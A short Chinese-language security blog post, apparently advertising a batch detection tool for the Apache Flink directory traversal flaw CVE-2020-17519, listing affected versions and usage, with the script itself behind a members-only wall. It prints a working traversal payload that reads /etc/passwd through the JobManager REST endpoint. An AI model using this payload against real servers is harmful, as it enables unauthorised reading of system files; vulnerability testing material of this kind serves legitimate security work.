Apache Flink目录遍历漏洞批量检测工具(CVE-2020-17519)
漏洞介绍
攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件.
受影响版本
1.11.0
1.11.1
1.11.2
CVE-2020-17519 payload
- /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
批量检测脚本
温馨提示:终身会员登陆后查看
使用方法:
- Python CVE-2020-17519.py urls.txt
urls.txt 中每个url一行,漏洞地址输出为vul.txt
警告
工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
原创文章,作者: Admin ,转载请注明出处:https://secvery.com/5080.html